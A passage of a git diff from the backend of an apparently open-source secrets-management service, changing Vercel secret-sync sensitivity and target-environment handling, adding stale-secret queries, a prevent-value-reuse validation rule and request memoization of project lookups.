(destinationConfig.sensitive || isExistingSensitive) && + !destinationConfig.applyToAllCustomEnvironments && + (!effectiveTargetEnvironments || effectiveTargetEnvironments.length === 0) + ) { + throw new SecretSyncError({ + message: + "Marking secrets as sensitive in Vercel is not supported for development environments. 
Add another target environment or disable Sensitive.", + secretKey: envVar.key, + shouldRetry: false + }); + } + try { const { data: updateResponse } = await request.patch<{ updated: VercelSharedEnvVar[]; @@ -518,8 +591,9 @@ const updateTeamSharedEnvVar = async ( updates: { [envVar.id]: { value, - ...(destinationConfig.targetEnvironments?.length ? { target: destinationConfig.targetEnvironments } : {}), - ...(destinationConfig.targetProjects !== undefined ? { projectId: destinationConfig.targetProjects } : {}) + ...(effectiveTargetEnvironments !== undefined ? { target: effectiveTargetEnvironments } : {}), + ...(destinationConfig.targetProjects !== undefined ? { projectId: destinationConfig.targetProjects } : {}), + applyToAllCustomEnvironments: Boolean(destinationConfig.applyToAllCustomEnvironments) } } }, @@ -599,38 +673,69 @@ const deleteTeamSharedEnvVar = async ( export const VercelSyncFns = { syncSecrets: async (secretSync: TVercelSyncWithCredentials, secretMap: TSecretMap) => { if (secretSync.destinationConfig.scope === VercelSyncScope.Team) { - const sharedEnvVars = await getTeamSharedEnvVars(secretSync); - const sharedEnvVarsMap = new Map(sharedEnvVars.map((s) => [s.key, s])); + const allSharedEnvVars = await getTeamSharedEnvVars(secretSync); + const sharedEnvVarsMap = new Map(allSharedEnvVars.map((s) => [s.key, s])); - const { targetEnvironments, targetProjects } = secretSync.destinationConfig; + const { targetEnvironments, targetProjects, sensitive, applyToAllCustomEnvironments } = + secretSync.destinationConfig; for await (const key of Object.keys(secretMap)) { const existingVar = sharedEnvVarsMap.get(key); if (!existingVar) { await createTeamSharedEnvVar(secretSync, key, secretMap[key].value); - } else { - const hasValueChanged = existingVar.value !== secretMap[key].value; + // eslint-disable-next-line no-continue + continue; + } - const hasTargetChanged = targetEnvironments?.length - ? 
existingVar.target.length !== targetEnvironments.length || - !targetEnvironments.every((env) => existingVar.target.includes(env)) - : false; + // Vercel does not allow changing a secret's `type` between encrypted and sensitive + // via PATCH, so we delete and recreate when the desired sensitivity differs. + const existingIsSensitive = existingVar.type === "sensitive"; + const sensitivityChanged = existingIsSensitive !== Boolean(sensitive); + + if (sensitivityChanged) { + await deleteTeamSharedEnvVar(secretSync, existingVar); + await createTeamSharedEnvVar(secretSync, key, secretMap[key].value); + // eslint-disable-next-line no-continue + continue; + } - const hasProjectsChanged = targetProjects - ? (existingVar.projectId?.length ?? 0) !== targetProjects.length || - !targetProjects.every((pid) => existingVar.projectId?.includes(pid)) + const hasValueChanged = existingVar.value !== secretMap[key].value; + + // Sensitive secrets cannot target Development in Vercel β€” strip before comparing. + const isSensitive = sensitive || existingVar.type === "sensitive"; + const effectiveTargets = targetEnvironments?.filter( + (env) => !isSensitive || env !== VercelEnvironmentType.Development + ); + + const existingTarget = existingVar.target ?? []; + const hasTargetChanged = + effectiveTargets !== undefined + ? existingTarget.length !== effectiveTargets.length || + !effectiveTargets.every((env) => existingTarget.includes(env)) : false; - if (hasValueChanged || hasTargetChanged || hasProjectsChanged) { - await updateTeamSharedEnvVar(secretSync, existingVar, secretMap[key].value); - } + const hasProjectsChanged = targetProjects + ? (existingVar.projectId?.length ?? 0) !== targetProjects.length || + !targetProjects.every((pid) => existingVar.projectId?.includes(pid)) + : false; + + const hasAllCustomChanged = + Boolean(applyToAllCustomEnvironments) !== (existingVar.applyToAllCustomEnvironments ?? 
false); + + if (hasValueChanged || hasTargetChanged || hasProjectsChanged || hasAllCustomChanged) { + await updateTeamSharedEnvVar(secretSync, existingVar, secretMap[key].value); } } if (secretSync.syncOptions.disableSecretDeletion) return; - for await (const sharedEnvVar of sharedEnvVars) { + const teamDestinationConfig = secretSync.destinationConfig; + const ownedEnvVars = allSharedEnvVars.filter((envVar) => + isTeamSharedEnvVarOwnedByThisSync(envVar, teamDestinationConfig) + ); + + for await (const sharedEnvVar of ownedEnvVars) { if (!matchesSchema(sharedEnvVar.key, secretSync.environment?.slug || "", secretSync.syncOptions.keySchema)) // eslint-disable-next-line no-continue continue; @@ -652,6 +757,18 @@ export const VercelSyncFns = { if (!existingSecret) { await createSecret(secretSync, secretMap, key); + // eslint-disable-next-line no-continue + continue; + } + + // Vercel does not allow changing a secret's `type` between encrypted and sensitive + // via PATCH, so we delete and recreate when the desired sensitivity differs. + const existingIsSensitive = existingSecret.type === "sensitive"; + const sensitivityChanged = existingIsSensitive !== Boolean(secretSync.destinationConfig.sensitive); + + if (sensitivityChanged) { + await deleteSecret(secretSync, existingSecret); + await createSecret(secretSync, secretMap, key); } else if (existingSecret.value !== secretMap[key].value) { await updateSecret(secretSync, secretMap, existingSecret); } @@ -673,7 +790,7 @@ export const VercelSyncFns = { getSecrets: async (secretSync: TVercelSyncWithCredentials): Promise => { if (secretSync.destinationConfig.scope === VercelSyncScope.Team) { - const sharedEnvVars = await getTeamSharedEnvVars(secretSync); + const sharedEnvVars = await getOwnedTeamSharedEnvVars(secretSync); return Object.fromEntries(sharedEnvVars.map((s) => [s.key, { value: s.value ?? 
"" }])); } @@ -683,7 +800,7 @@ export const VercelSyncFns = { removeSecrets: async (secretSync: TVercelSyncWithCredentials, secretMap: TSecretMap) => { if (secretSync.destinationConfig.scope === VercelSyncScope.Team) { - const sharedEnvVars = await getTeamSharedEnvVars(secretSync); + const sharedEnvVars = await getOwnedTeamSharedEnvVars(secretSync); for await (const sharedEnvVar of sharedEnvVars) { if (sharedEnvVar.key in secretMap) { diff --git a/backend/src/services/secret-sync/vercel/vercel-sync-schemas.ts b/backend/src/services/secret-sync/vercel/vercel-sync-schemas.ts index 36f60f463c9..930f56a82fd 100644 --- a/backend/src/services/secret-sync/vercel/vercel-sync-schemas.ts +++ b/backend/src/services/secret-sync/vercel/vercel-sync-schemas.ts @@ -13,26 +13,56 @@ import { TSyncOptionsConfig } from "@app/services/secret-sync/secret-sync-types" import { SECRET_SYNC_NAME_MAP } from "../secret-sync-maps"; import { VercelEnvironmentType, VercelSyncScope } from "./vercel-sync-enums"; -const VercelSyncDestinationConfigSchema = z.discriminatedUnion("scope", [ - z.object({ - scope: z.literal(VercelSyncScope.Project), - app: z.string().min(1, "App ID is required").describe(SecretSyncs.DESTINATION_CONFIG.VERCEL.app), - appName: z.string().min(1, "App Name is required").describe(SecretSyncs.DESTINATION_CONFIG.VERCEL.appName), - env: z.nativeEnum(VercelEnvironmentType).or(z.string()).describe(SecretSyncs.DESTINATION_CONFIG.VERCEL.env), - branch: z.string().optional().describe(SecretSyncs.DESTINATION_CONFIG.VERCEL.branch), - teamId: z.string().describe(SecretSyncs.DESTINATION_CONFIG.VERCEL.teamId) - }), - z.object({ - scope: z.literal(VercelSyncScope.Team), - teamId: z.string().min(1, "Team ID is required").describe(SecretSyncs.DESTINATION_CONFIG.VERCEL.teamId), - teamName: z.string().optional().describe(SecretSyncs.DESTINATION_CONFIG.VERCEL.teamName), - targetEnvironments: z - .array(z.nativeEnum(VercelEnvironmentType)) - .min(1, "At least one environment is required") - 
.describe(SecretSyncs.DESTINATION_CONFIG.VERCEL.targetEnvironments), - targetProjects: z.array(z.string()).optional().describe(SecretSyncs.DESTINATION_CONFIG.VERCEL.targetProjects) - }) -]); +const VercelSyncDestinationConfigSchema = z + .discriminatedUnion("scope", [ + z.object({ + scope: z.literal(VercelSyncScope.Project), + app: z.string().min(1, "App ID is required").describe(SecretSyncs.DESTINATION_CONFIG.VERCEL.app), + appName: z.string().min(1, "App Name is required").describe(SecretSyncs.DESTINATION_CONFIG.VERCEL.appName), + env: z.nativeEnum(VercelEnvironmentType).or(z.string()).describe(SecretSyncs.DESTINATION_CONFIG.VERCEL.env), + branch: z.string().optional().describe(SecretSyncs.DESTINATION_CONFIG.VERCEL.branch), + teamId: z.string().describe(SecretSyncs.DESTINATION_CONFIG.VERCEL.teamId), + sensitive: z.boolean().default(false).describe(SecretSyncs.DESTINATION_CONFIG.VERCEL.sensitive) + }), + z.object({ + scope: z.literal(VercelSyncScope.Team), + teamId: z.string().min(1, "Team ID is required").describe(SecretSyncs.DESTINATION_CONFIG.VERCEL.teamId), + teamName: z.string().optional().describe(SecretSyncs.DESTINATION_CONFIG.VERCEL.teamName), + targetEnvironments: z + .array(z.nativeEnum(VercelEnvironmentType)) + .optional() + .default([]) + .describe(SecretSyncs.DESTINATION_CONFIG.VERCEL.targetEnvironments), + applyToAllCustomEnvironments: z + .boolean() + .optional() + .default(false) + .describe(SecretSyncs.DESTINATION_CONFIG.VERCEL.applyToAllCustomEnvironments), + targetProjects: z.array(z.string()).optional().describe(SecretSyncs.DESTINATION_CONFIG.VERCEL.targetProjects), + sensitive: z.boolean().default(false).describe(SecretSyncs.DESTINATION_CONFIG.VERCEL.sensitive) + }) + ]) + .superRefine((config, ctx) => { + if (config.scope === VercelSyncScope.Team) { + if (!config.targetEnvironments?.length && !config.applyToAllCustomEnvironments) { + ctx.addIssue({ + code: z.ZodIssueCode.custom, + message: "At least one target environment or 
applyToAllCustomEnvironments must be set.", + path: ["targetEnvironments"] + }); + } + } + + if (!config.sensitive) return; + + if (config.scope === VercelSyncScope.Project && config.env === VercelEnvironmentType.Development) { + ctx.addIssue({ + code: z.ZodIssueCode.custom, + message: "Marking secrets as sensitive in Vercel is not supported for development environments.", + path: ["sensitive"] + }); + } + }); const VercelSyncOptionsConfig: TSyncOptionsConfig = { canImportSecrets: true }; diff --git a/backend/src/services/secret-sync/vercel/vercel-sync-types.ts b/backend/src/services/secret-sync/vercel/vercel-sync-types.ts index 6d29e517ece..aef68f5dfdd 100644 --- a/backend/src/services/secret-sync/vercel/vercel-sync-types.ts +++ b/backend/src/services/secret-sync/vercel/vercel-sync-types.ts @@ -44,8 +44,9 @@ export interface VercelSharedEnvVar { key: string; value: string; type: string; - target: string[]; + target?: string[]; projectId?: string[]; + applyToAllCustomEnvironments?: boolean; decrypted?: boolean; comment?: string; createdAt?: number; diff --git a/backend/src/services/secret-v2-bridge/secret-v2-bridge-dal.ts b/backend/src/services/secret-v2-bridge/secret-v2-bridge-dal.ts index 13295398038..c01fc9178c0 100644 --- a/backend/src/services/secret-v2-bridge/secret-v2-bridge-dal.ts +++ b/backend/src/services/secret-v2-bridge/secret-v2-bridge-dal.ts @@ -1128,6 +1128,52 @@ export const secretV2BridgeDALFactory = ({ db, keyStore }: TSecretV2DalArg) => { } }; + const findStaleByProject = async ( + projectId: string, + staleBeforeDate: Date, + pagination?: { offset: number; limit: number }, + tx?: Knex + ) => { + try { + const result = await (tx || db.replicaNode())(TableName.SecretV2) + .join(TableName.SecretFolder, `${TableName.SecretV2}.folderId`, `${TableName.SecretFolder}.id`) + .join(TableName.Environment, `${TableName.SecretFolder}.envId`, `${TableName.Environment}.id`) + .where(`${TableName.Environment}.projectId`, projectId) + 
.whereNull(`${TableName.SecretV2}.userId`) + .where(`${TableName.SecretV2}.updatedAt`, "<", staleBeforeDate) + .select( + `${TableName.SecretV2}.key`, + `${TableName.SecretV2}.updatedAt`, + `${TableName.SecretV2}.folderId`, + `${TableName.Environment}.slug as environment` + ) + .orderBy(`${TableName.SecretV2}.updatedAt`, "asc") + .offset(pagination?.offset ?? 0) + .limit(pagination?.limit ?? 50); + + return result as { key: string; updatedAt: Date; folderId: string; environment: string }[]; + } catch (error) { + throw new DatabaseError({ error, name: "findStaleByProject" }); + } + }; + + const countStaleByProject = async (projectId: string, staleBeforeDate: Date, tx?: Knex) => { + try { + const result = await (tx || db.replicaNode())(TableName.SecretV2) + .join(TableName.SecretFolder, `${TableName.SecretV2}.folderId`, `${TableName.SecretFolder}.id`) + .join(TableName.Environment, `${TableName.SecretFolder}.envId`, `${TableName.Environment}.id`) + .where(`${TableName.Environment}.projectId`, projectId) + .whereNull(`${TableName.SecretV2}.userId`) + .where(`${TableName.SecretV2}.updatedAt`, "<", staleBeforeDate) + .count("* as count") + .first(); + + return Number((result as { count?: string | number })?.count ?? 
0); + } catch (error) { + throw new DatabaseError({ error, name: "countStaleByProject" }); + } + }; + return { ...secretOrm, update, @@ -1144,6 +1190,8 @@ export const secretV2BridgeDALFactory = ({ db, keyStore }: TSecretV2DalArg) => { findReferencedSecretReferences, findAllProjectSecretValues, countByFolderIds, + findStaleByProject, + countStaleByProject, findOne, find, invalidateSecretCacheByProjectId, diff --git a/backend/src/services/secret-v2-bridge/secret-v2-bridge-fns.ts b/backend/src/services/secret-v2-bridge/secret-v2-bridge-fns.ts index 646609b3e9c..5ee6b332d03 100644 --- a/backend/src/services/secret-v2-bridge/secret-v2-bridge-fns.ts +++ b/backend/src/services/secret-v2-bridge/secret-v2-bridge-fns.ts @@ -271,6 +271,7 @@ export const fnSecretBulkUpdate = async ({ const secsUpdatedTag = inputSecrets.flatMap(({ data: { tags } }, i) => tags !== undefined ? { tags, secretId: newSecrets[i].id } : [] ); + if (secsUpdatedTag.length) { await secretTagDAL.deleteTagsToSecretV2( { $in: { secrets_v2Id: secsUpdatedTag.map(({ secretId }) => secretId) } }, diff --git a/backend/src/services/secret-v2-bridge/secret-v2-bridge-service.ts b/backend/src/services/secret-v2-bridge/secret-v2-bridge-service.ts index 4df76875940..4efe00646d7 100644 --- a/backend/src/services/secret-v2-bridge/secret-v2-bridge-service.ts +++ b/backend/src/services/secret-v2-bridge/secret-v2-bridge-service.ts @@ -33,7 +33,7 @@ import { } from "@app/ee/services/secret-approval-request/secret-approval-request-types"; import { scanSecretPolicyViolations } from "@app/ee/services/secret-scanning-v2/secret-scanning-v2-fns"; import { TSecretSnapshotServiceFactory } from "@app/ee/services/secret-snapshot/secret-snapshot-service"; -import { KeyStorePrefixes, TKeyStoreFactory } from "@app/keystore/keystore"; +import { KeyStorePrefixes, KeyStoreTtls, TKeyStoreFactory } from "@app/keystore/keystore"; import { generateCacheKeyFromData } from "@app/lib/crypto/cache"; import { DatabaseErrorCode } from 
"@app/lib/error-codes"; import { BadRequestError, ForbiddenRequestError, NotFoundError } from "@app/lib/errors"; @@ -147,8 +147,6 @@ type TSecretV2BridgeServiceFactoryDep = { secretValidationRuleService: Pick; }; -const ETAG_TTL = 900; // 15 minutes in seconds - export type TSecretV2BridgeServiceFactory = ReturnType; /* @@ -631,7 +629,7 @@ export const secretV2BridgeServiceFactory = ({ environment, envId: folder.envId, secretPath, - secrets: [{ key: finalKey, value: secretValue }] + secrets: [{ key: finalKey, value: secretValue, secretId }] }); } @@ -1247,7 +1245,7 @@ export const secretV2BridgeServiceFactory = ({ }; const cachedEtag = `"${generateCacheKeyFromData(payload)}"`; await keyStore.hashSet(etagRedisKey, etagField, cachedEtag); - await keyStore.setExpiry(etagRedisKey, ETAG_TTL); + await keyStore.setExpiry(etagRedisKey, KeyStoreTtls.SecretEtagInSeconds); return { ...payload, etag: cachedEtag }; } catch (err) { logger.error(err, "Secret service layer cache miss"); @@ -1498,7 +1496,7 @@ export const secretV2BridgeServiceFactory = ({ } const computedEtag = `"${generateCacheKeyFromData(payload)}"`; await keyStore.hashSet(etagRedisKey, etagField, computedEtag); - await keyStore.setExpiry(etagRedisKey, ETAG_TTL); + await keyStore.setExpiry(etagRedisKey, KeyStoreTtls.SecretEtagInSeconds); return { ...payload, etag: computedEtag }; } @@ -1572,7 +1570,7 @@ export const secretV2BridgeServiceFactory = ({ } const computedEtag = `"${generateCacheKeyFromData(payload)}"`; await keyStore.hashSet(etagRedisKey, etagField, computedEtag); - await keyStore.setExpiry(etagRedisKey, ETAG_TTL); + await keyStore.setExpiry(etagRedisKey, KeyStoreTtls.SecretEtagInSeconds); return { ...payload, etag: computedEtag }; }; @@ -2337,7 +2335,11 @@ export const secretV2BridgeServiceFactory = ({ const secretsToValidate = [ ...secretsToUpdate .filter((el) => el.secretValue || el.newSecretName) - .map((el) => ({ key: el.newSecretName || el.secretKey, value: el.secretValue })), + .map((el) => ({ + 
key: el.newSecretName || el.secretKey, + value: el.secretValue, + secretId: secretsToUpdateInDBGroupedByKey[el.secretKey]?.[0]?.id + })), ...(updateMode === SecretUpdateMode.Upsert ? secretsToCreate.map((el) => ({ key: el.secretKey, value: el.secretValue })) : []) @@ -2981,6 +2983,17 @@ export const secretV2BridgeServiceFactory = ({ const destinationSecretsGroupedByKey = groupBy(decryptedDestinationSecrets, (i) => i.key); + const sourceKeys = decryptedSourceSecrets.map((s) => s.key); + + const conflictingRotationSecretKeys = sourceKeys.filter( + (key) => destinationSecretsGroupedByKey[key]?.[0]?.isRotatedSecret + ); + if (conflictingRotationSecretKeys.length > 0) { + throw new BadRequestError({ + message: `Cannot move secrets to '${destinationFolder.path}' because the following keys are managed by a secret rotation at the destination: ${conflictingRotationSecretKeys.join(", ")}` + }); + } + const locallyCreatedSecrets = decryptedSourceSecrets .filter(({ key }) => !destinationSecretsGroupedByKey[key]?.[0]) .map((el) => ({ ...el, operation: SecretOperations.Create })); diff --git a/backend/src/services/secret-validation-rule/secret-validation-rule-fns.ts b/backend/src/services/secret-validation-rule/secret-validation-rule-fns.ts index 303a720f426..82299190ec0 100644 --- a/backend/src/services/secret-validation-rule/secret-validation-rule-fns.ts +++ b/backend/src/services/secret-validation-rule/secret-validation-rule-fns.ts @@ -3,6 +3,7 @@ import RE2 from "re2"; import { BadRequestError } from "@app/lib/errors"; +import { MAX_PREVENT_VALUE_REUSE_VERSIONS } from "./secret-validation-rule-schemas"; import { ConstraintTarget, ConstraintType, @@ -146,6 +147,7 @@ export const checkForOverlappingRules = ({ type TSecretToValidate = { key: string; value?: string; + previousValues?: string[]; }; type TValidationRule = { @@ -168,7 +170,8 @@ const CONSTRAINT_LABELS: Record = { [ConstraintType.MaxLength]: "Maximum length", [ConstraintType.RegexPattern]: "Regex pattern", 
[ConstraintType.RequiredPrefix]: "Required prefix", - [ConstraintType.RequiredSuffix]: "Required suffix" + [ConstraintType.RequiredSuffix]: "Required suffix", + [ConstraintType.PreventValueReuse]: "Prevent reuse of previous secret values" }; const TARGET_LABELS: Record = { @@ -234,6 +237,17 @@ const evaluateConstraint = (constraint: TConstraint, secret: TSecretToValidate): } return null; } + case ConstraintType.PreventValueReuse: { + if (secret.value === undefined || !secret.previousValues?.length) { + return null; + } + const versionCount = Number(constraint.value) || MAX_PREVENT_VALUE_REUSE_VERSIONS; + const valuesToCheck = secret.previousValues.slice(0, versionCount); + if (valuesToCheck.includes(secret.value)) { + return `${targetLabel} cannot reuse any of the last ${versionCount} values`; + } + return null; + } default: return null; } diff --git a/backend/src/services/secret-validation-rule/secret-validation-rule-schemas.ts b/backend/src/services/secret-validation-rule/secret-validation-rule-schemas.ts index b69d9a843bd..b00d1e3f083 100644 --- a/backend/src/services/secret-validation-rule/secret-validation-rule-schemas.ts +++ b/backend/src/services/secret-validation-rule/secret-validation-rule-schemas.ts @@ -9,11 +9,33 @@ import { TSecretValidationRuleInputs } from "./secret-validation-rule-types"; -export const constraintSchema = z.object({ - type: z.nativeEnum(ConstraintType), - appliesTo: z.nativeEnum(ConstraintTarget), - value: z.string().min(1) -}); +export const MAX_PREVENT_VALUE_REUSE_VERSIONS = 25; + +export const constraintSchema = z + .object({ + type: z.nativeEnum(ConstraintType), + appliesTo: z.nativeEnum(ConstraintTarget), + value: z.string() + }) + .refine((c) => c.type === ConstraintType.PreventValueReuse || c.value.length > 0, { + message: "Value is required", + path: ["value"] + }) + .refine((c) => c.type !== ConstraintType.PreventValueReuse || c.appliesTo === ConstraintTarget.SecretValue, { + message: "No value reuse constraint can only apply 
to secret values", + path: ["appliesTo"] + }) + .refine( + (c) => { + if (c.type !== ConstraintType.PreventValueReuse) return true; + const num = Number(c.value); + return Number.isInteger(num) && num >= 1 && num <= MAX_PREVENT_VALUE_REUSE_VERSIONS; + }, + { + message: `Prevent value reuse version count must be between 1 and ${MAX_PREVENT_VALUE_REUSE_VERSIONS}`, + path: ["value"] + } + ); export const staticSecretsInputsSchema = z.object({ constraints: z.array(constraintSchema).min(1) diff --git a/backend/src/services/secret-validation-rule/secret-validation-rule-service.ts b/backend/src/services/secret-validation-rule/secret-validation-rule-service.ts index 7f7f96816a7..b7ccc1e8d37 100644 --- a/backend/src/services/secret-validation-rule/secret-validation-rule-service.ts +++ b/backend/src/services/secret-validation-rule/secret-validation-rule-service.ts @@ -1,4 +1,5 @@ import { ForbiddenError } from "@casl/ability"; +import picomatch from "picomatch"; import { ActionProjectType } from "@app/db/schemas"; import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types"; @@ -11,10 +12,13 @@ import { KmsDataKey } from "../kms/kms-types"; import { TSecretFolderDALFactory } from "../secret-folder/secret-folder-dal"; import { expandSecretReferencesFactory } from "../secret-v2-bridge/secret-reference-fns"; import { TSecretV2BridgeDALFactory } from "../secret-v2-bridge/secret-v2-bridge-dal"; +import { TSecretVersionV2DALFactory } from "../secret-v2-bridge/secret-version-dal"; import { TSecretValidationRuleDALFactory } from "./secret-validation-rule-dal"; import { checkForOverlappingRules, enforceSecretValidationRules } from "./secret-validation-rule-fns"; -import { parseSecretValidationRuleInputs } from "./secret-validation-rule-schemas"; +import { MAX_PREVENT_VALUE_REUSE_VERSIONS, parseSecretValidationRuleInputs } from "./secret-validation-rule-schemas"; import { + ConstraintTarget, + ConstraintType, SecretValidationRuleType, 
TCreateSecretValidationRuleDTO, TDeleteSecretValidationRuleDTO, @@ -27,6 +31,7 @@ type TSecretValidationRuleServiceFactoryDep = { projectEnvDAL: Pick; folderDAL: Pick; secretDAL: TSecretV2BridgeDALFactory; + secretVersionV2BridgeDAL: Pick; permissionService: Pick; kmsService: TKmsServiceFactory; }; @@ -38,6 +43,7 @@ export const secretValidationRuleServiceFactory = ({ projectEnvDAL, folderDAL, secretDAL, + secretVersionV2BridgeDAL, permissionService, kmsService }: TSecretValidationRuleServiceFactoryDep) => { @@ -321,7 +327,7 @@ export const secretValidationRuleServiceFactory = ({ environment: string; envId: string; secretPath: string; - secrets: { key: string; value?: string }[]; + secrets: { key: string; value?: string; secretId?: string }[]; }) => { if (!secrets.length) return; @@ -341,9 +347,61 @@ export const secretValidationRuleServiceFactory = ({ canExpandValue: () => true }); - let resolvedSecrets = secrets; + const { decryptor: ruleInputsDecryptor } = await kmsService.createCipherPairWithDataKey({ + type: KmsDataKey.SecretManager, + projectId + }); + + const parsedRules = rules.map((r) => ({ + ...r, + inputs: parseSecretValidationRuleInputs( + r.type, + JSON.parse(ruleInputsDecryptor({ cipherTextBlob: r.encryptedInputs }).toString()) as unknown + ) + })); + + // filter to rules that actually match this environment + path so we don't trigger expensive version-history lookups for unrelated PreventValueReuse rules. 
+ const matchingRules = parsedRules.filter((r) => { + if (r.envId && r.envId !== envId) return false; + return picomatch.isMatch(secretPath, r.secretPath, { strictSlashes: false }); + }); - resolvedSecrets = await Promise.all( + const hasPreventValueReuseConstraint = matchingRules.some((r) => + r.inputs.constraints?.some( + (c) => c.type === ConstraintType.PreventValueReuse && c.appliesTo === ConstraintTarget.SecretValue + ) + ); + + const previousValuesMap: Record = {}; + if (hasPreventValueReuseConstraint) { + const secretIdsToCheck = secrets.filter((s) => s.secretId).map((s) => s.secretId!); + if (secretIdsToCheck.length) { + const allVersions = await Promise.all( + secretIdsToCheck.map((sId) => + secretVersionV2BridgeDAL.find( + { secretId: sId }, + { sort: [["version", "desc"]], limit: MAX_PREVENT_VALUE_REUSE_VERSIONS } + ) + ) + ); + + for (const versions of allVersions) { + for (const version of versions) { + if (!version.encryptedValue) { + // eslint-disable-next-line no-continue + continue; + } + const decryptedValue = secretManagerDecryptor({ cipherTextBlob: version.encryptedValue }).toString(); + if (!previousValuesMap[version.secretId]) { + previousValuesMap[version.secretId] = []; + } + previousValuesMap[version.secretId].push(decryptedValue); + } + } + } + } + + const resolvedSecrets = await Promise.all( secrets.map(async (s) => ({ key: s.key, value: await expandSecretReferences({ @@ -351,23 +409,13 @@ export const secretValidationRuleServiceFactory = ({ secretPath, environment, secretKey: s.key - }) + }), + ...(s.secretId && previousValuesMap[s.secretId] ? 
{ previousValues: previousValuesMap[s.secretId] } : {}) })) ); - const { decryptor: ruleInputsDecryptor } = await kmsService.createCipherPairWithDataKey({ - type: KmsDataKey.SecretManager, - projectId - }); - enforceSecretValidationRules({ - projectRules: rules.map((r) => ({ - ...r, - inputs: parseSecretValidationRuleInputs( - r.type, - JSON.parse(ruleInputsDecryptor({ cipherTextBlob: r.encryptedInputs }).toString()) as unknown - ) - })), + projectRules: parsedRules, envId, secretPath, secrets: resolvedSecrets diff --git a/backend/src/services/secret-validation-rule/secret-validation-rule-types.ts b/backend/src/services/secret-validation-rule/secret-validation-rule-types.ts index b71f2df8af9..c41e30b5443 100644 --- a/backend/src/services/secret-validation-rule/secret-validation-rule-types.ts +++ b/backend/src/services/secret-validation-rule/secret-validation-rule-types.ts @@ -9,7 +9,8 @@ export enum ConstraintType { MaxLength = "max-length", RegexPattern = "regex-pattern", RequiredPrefix = "required-prefix", - RequiredSuffix = "required-suffix" + RequiredSuffix = "required-suffix", + PreventValueReuse = "prevent-value-reuse" } export enum ConstraintTarget { diff --git a/backend/src/services/secret/secret-queue.ts b/backend/src/services/secret/secret-queue.ts index 3f5163c76ba..8b6f8aab034 100644 --- a/backend/src/services/secret/secret-queue.ts +++ b/backend/src/services/secret/secret-queue.ts @@ -18,7 +18,6 @@ import { TLicenseServiceFactory } from "@app/ee/services/license/license-service import { TProjectEventsService } from "@app/ee/services/project-events/project-events-service"; import { ProjectEvents, TProjectEventPayload } from "@app/ee/services/project-events/project-events-types"; import { TSecretApprovalRequestDALFactory } from "@app/ee/services/secret-approval-request/secret-approval-request-dal"; -import { TSecretRotationDALFactory } from "@app/ee/services/secret-rotation/secret-rotation-dal"; import { TSnapshotDALFactory } from 
"@app/ee/services/secret-snapshot/snapshot-dal"; import { TSnapshotSecretV2DALFactory } from "@app/ee/services/secret-snapshot/snapshot-secret-v2-dal"; import { KeyStorePrefixes, KeyStoreTtls, TKeyStoreFactory } from "@app/keystore/keystore"; @@ -113,7 +112,6 @@ type TSecretQueueFactoryDep = { secretV2BridgeDAL: TSecretV2BridgeDALFactory; secretVersionV2BridgeDAL: Pick; secretVersionTagV2BridgeDAL: Pick; - secretRotationDAL: Pick; secretApprovalRequestDAL: Pick; snapshotDAL: Pick; snapshotSecretV2BridgeDAL: Pick; @@ -178,8 +176,8 @@ export const secretQueueFactory = ({ secretVersionV2BridgeDAL, kmsService, secretVersionTagV2BridgeDAL, - secretRotationDAL, snapshotDAL, + snapshotSecretV2BridgeDAL, secretApprovalRequestDAL, keyStore, @@ -1557,17 +1555,6 @@ export const secretQueueFactory = ({ "id", tx ); - /* - * Secret Rotation Secret Migration - * Saving the new encrypted colum - * */ - const projectV1SecretRotations = await secretRotationDAL.find({ projectId }, tx); - await secretRotationDAL.secretOutputV2InsertMany( - projectV1SecretRotations.flatMap((el) => - el.outputs.map((output) => ({ rotationId: el.id, key: output.key, secretId: output.secret.id })) - ), - tx - ); /* * approvals: we will delete all approvals this is because some secret versions may not be added yet diff --git a/backend/src/services/secret/secret-service.ts b/backend/src/services/secret/secret-service.ts index f5a255eb6d6..a8c4580ad73 100644 --- a/backend/src/services/secret/secret-service.ts +++ b/backend/src/services/secret/secret-service.ts @@ -3055,7 +3055,9 @@ export const secretServiceFactory = ({ if (projectSlug) { project = await projectDAL.findProjectBySlug(projectSlug, actorOrgId); } else if (inputProjectId) { - project = await projectDAL.findById(inputProjectId); + project = await requestMemoize(requestMemoKeys.projectFindById(inputProjectId), () => + projectDAL.findById(inputProjectId) + ); } if (!project) { @@ -3592,12 +3594,7 @@ export const secretServiceFactory = ({ throw new 
NotFoundError({ message: `Secret version with ID '${versionId}' not found` }); } - const project = await projectDAL.findById(version.projectId); - if (!project) { - throw new NotFoundError({ message: `Project with ID '${version.projectId}' not found` }); - } - - const { shouldUseSecretV2Bridge } = await projectBotService.getBotKey(project.id); + const { shouldUseSecretV2Bridge } = await projectBotService.getBotKey(version.projectId); if (!shouldUseSecretV2Bridge) { throw new BadRequestError({ message: "Project version not supported", diff --git a/backend/src/services/service-token/service-token-service.ts b/backend/src/services/service-token/service-token-service.ts index 8f7b0a1b7b2..d99bd0e835a 100644 --- a/backend/src/services/service-token/service-token-service.ts +++ b/backend/src/services/service-token/service-token-service.ts @@ -11,6 +11,8 @@ import { getConfig } from "@app/lib/config/env"; import { crypto } from "@app/lib/crypto/cryptography"; import { ForbiddenRequestError, NotFoundError, UnauthorizedError } from "@app/lib/errors"; import { logger } from "@app/lib/logger"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { TAccessTokenQueueServiceFactory } from "../access-token-queue/access-token-queue"; import { ActorType } from "../auth/auth-type"; @@ -174,7 +176,9 @@ export const serviceTokenServiceFactory = ({ const serviceToken = await serviceTokenDAL.findById(tokenIdentifier); if (!serviceToken) throw new NotFoundError({ message: `Service token with ID '${tokenIdentifier}' not found` }); - const project = await projectDAL.findById(serviceToken.projectId); + const project = await requestMemoize(requestMemoKeys.projectFindById(serviceToken.projectId), () => + projectDAL.findById(serviceToken.projectId) + ); if (!project) throw new NotFoundError({ message: `Project with ID '${serviceToken.projectId}' not found` }); @@ -187,7 +191,9 @@ export const 
